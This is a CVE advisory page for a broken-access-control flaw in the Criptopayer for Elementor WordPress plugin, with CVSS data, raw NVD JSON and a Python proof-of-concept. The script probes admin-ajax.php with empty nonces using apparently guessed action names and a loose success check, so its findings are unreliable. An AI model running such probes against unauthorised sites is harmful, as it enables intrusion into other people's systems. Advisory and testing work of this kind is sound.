Security Vulnerability Report
中文
CVE-2025-66152 CVSS 5.4 MEDIUM

CVE-2025-66152

Published: 2025-12-31 19:15:45
Last Modified: 2026-04-23 15:35:28

Description

Missing Authorization vulnerability in merkulove Criptopayer for Elementor criptopayer-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Criptopayer for Elementor: from n/a through <= 1.0.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Criptopayer for Elementor <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66152 PoC - Missing Authorization in Criptopayer for Elementor # Target: WordPress site with Criptopayer for Elementor plugin <= 1.0.1 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-66152 This PoC attempts to access admin functions without authentication """ # Common WordPress AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Try to access plugin functions without proper authorization # Replace 'action_name' with actual vulnerable action identified vulnerable_actions = [ 'criptopayer_get_settings', 'criptopayer_save_config', 'criptopayer_update_payment' ] for action in vulnerable_actions: data = { 'action': action, # Low-privilege user nonce or no nonce at all '_wpnonce': '' } try: response = requests.post(ajax_url, data=data, timeout=10) # If response indicates success without auth, vulnerability exists if response.status_code == 200: # Check for data exposure or unauthorized access indicators if 'success' in response.text or 'data' in response.text: print(f"[+] Potential vulnerability found: {action}") print(f"[+] Response: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {action}: {e}") return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] if check_vulnerability(target): print("\n[!] Target appears to be vulnerable to CVE-2025-66152") else: print("\n[-] Target may not be vulnerable or plugin not installed") else: print("Usage: python poc.py http://target.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66152", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:44.533", "lastModified": "2026-04-23T15:35:28.427", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Criptopayer for Elementor criptopayer-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Criptopayer for Elementor: from n/a through <= 1.0.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en merkulove Criptopayer para Elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Criptopayer para Elementor: desde n/a hasta 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/criptopayer-elementor/vulnerability/wordpress-criptopayer-for-elementor-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}